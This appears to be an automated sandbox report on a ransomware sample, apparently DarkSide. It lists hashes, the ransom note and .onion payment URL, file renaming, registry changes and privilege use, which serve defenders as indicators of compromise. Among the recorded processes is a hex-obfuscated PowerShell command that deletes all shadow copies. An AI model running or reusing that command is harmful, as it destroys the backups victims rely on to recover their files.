Analysis
-
max time kernel
23s -
max time network
17s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
16-01-2021 16:12
Static task
static1
Behavioral task
behavioral1
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
Resource
win10v20201028
General
-
Target
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
-
Size
59KB
-
MD5
0ed51a595631e9b4d60896ab5573332f
-
SHA1
7ae73b5e1622049380c9b615ce3b7f636665584b
-
SHA256
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
-
SHA512
9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
Malware Config
Extracted
C:\\README.d2dea982.TXT
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\MoveDisable.raw => C:\Users\Admin\Pictures\MoveDisable.raw.d2dea982 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\MoveDisable.raw.d2dea982 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File renamed C:\Users\Admin\Pictures\StartEnter.raw => C:\Users\Admin\Pictures\StartEnter.raw.d2dea982 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe File opened for modification C:\Users\Admin\Pictures\StartEnter.raw.d2dea982 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\d2dea982.BMP" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\d2dea982.BMP" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Modifies Control Panel 1 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Desktop\WallpaperStyle = "10" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Modifies registry class 5 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.d2dea982 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.d2dea982\ = "d2dea982" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\d2dea982\DefaultIcon 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\d2dea982 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\d2dea982\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\d2dea982.ico" 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exepid process 1212 powershell.exe 1212 powershell.exe 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSecurityPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeTakeOwnershipPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeLoadDriverPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSystemProfilePrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSystemtimePrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeProfSingleProcessPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeIncBasePriorityPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeCreatePagefilePrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeBackupPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeRestorePrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeShutdownPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeDebugPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeSystemEnvironmentPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeRemoteShutdownPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeUndockPrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeManageVolumePrivilege 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: 33 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: 34 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: 35 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeBackupPrivilege 816 vssvc.exe Token: SeRestorePrivilege 816 vssvc.exe Token: SeAuditPrivilege 816 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exedescription pid process target process PID 1676 wrote to memory of 1212 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe powershell.exe PID 1676 wrote to memory of 1212 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe powershell.exe PID 1676 wrote to memory of 1212 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe powershell.exe PID 1676 wrote to memory of 1212 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe"C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
d062fb56ebc586a836aa20e4eef00002
SHA1530da314ef303a360e3ce33813b575ecd7ee5237
SHA256beb031ed7ca105fe51883b753c80ceb7654d7260c3886e47023473b6b0d2464a
SHA5124d4572b8a16fcec1cdbb28e14c82b504723da93c3530f278dce7435c6d98474c4599de3c880ac02c51dc252643512ffe3ca0c6e0a9171a8d6d8903c52bcc2375
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
d74f9cda1b430f046b3ab7fbe467ef85
SHA116463a4863474a2b3b81a2e33fa31ea28745b59a
SHA2564b9eca11423c701c6e608cfa21d1bf6524f0dbf93409afc298f927d6d007ba1a
SHA51272e235edaca9deb933c248cdd39410a655d862902d5c56fe2035404336c1c7e5f6cdce269e1995c0cceed756de25b68995109b5a48a9a338ff10d3d4947ce635
-
memory/1212-2-0x0000000000000000-mapping.dmp
-
memory/1212-3-0x000007FEF4F30000-0x000007FEF591C000-memory.dmpFilesize
9.9MB
-
memory/1212-4-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/1212-5-0x000000001ADA0000-0x000000001ADA1000-memory.dmpFilesize
4KB
-
memory/1212-6-0x0000000002490000-0x0000000002491000-memory.dmpFilesize
4KB
-
memory/1212-7-0x0000000001F20000-0x0000000001F21000-memory.dmpFilesize
4KB
-
memory/1212-8-0x000000001C1E0000-0x000000001C1E1000-memory.dmpFilesize
4KB
-
memory/1212-9-0x000000001C540000-0x000000001C541000-memory.dmpFilesize
4KB